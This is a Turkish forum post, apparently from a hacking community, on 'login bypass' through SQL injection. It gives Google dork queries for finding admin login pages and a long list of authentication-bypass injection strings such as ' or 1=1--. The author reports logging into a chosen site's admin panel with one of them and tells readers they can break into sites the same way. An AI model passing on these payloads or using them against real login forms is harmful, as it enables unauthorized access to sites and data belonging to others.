Herkese merhabalar bugün forumda da bir çok kez ele alınmış Login Bypass nedir bundan bahsedicem
hadi geçelim.
1. Login Bypass nedir?
2. Admin Paneller nasıl bulunur?
3. Login Bypass nasıl yapılır?
Login Bypass Nedir?
Login Bypass, bu açık türü SQL açığına girer. Özellikle PHP tabanlı MySQL ve MariaDB gibi veritabanı kullanan siteler için geçerlidir. Username ve Password kısmına çeşitli bypass edici kodların yazılması ile sitenin admin(yönetici) kısmına sızılmaya çalışılır. Kısaca mantık böyledir.
Admin Paneller Nasıl Bulunur?
Admin Panelleri bulmak için google dorklarını kullanıcaz. Dork nedir bilmiyorsanız ilk konuma bakabilirsiniz aşagida link verecem. Şimdi google dorkumuzu girdik ve sonuç olarak sitelerin admin panelleri geldi.
örnek dorklar.
Kod:
inurl:admin.php?id=
inurl:/admin/login.php
inurl:/admin/index.php
Evet dorkumuzu yazdık ve çıkan sonuçlara bakalım.
bakınız bir sürü admin panel çıktı.
Login Bypass nasıl yapılır?
Öncelikle bir admin panel seçmemiz lazım ve paneldeki username password kısmına aşağida verdiğim kodları yazıp denememiz gerekiyor, ikisinede yazarken aynı kodu yazacaz. hadi admin panel seçelim.
Seçtiğim panel bu
username ve password kısmına denenecek kodlar
Kod:
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--
Gördüğünüz gibi ben ' or 1=1 or ''=' bu kodu koydum ve
login dedim
Sizinde Gördüğünüz gibi bypass edici kod ile
sitenin admin paneline girdik sizde bu yöntem ile sitelere girebilirsiniz teşekkürler.
@El Petr
önceki dork nedir konum: https://www.turkhackteam.org/konular/dork-nedir-nasil-yazilir-nasil-taranir.2044156/
Son düzenleme: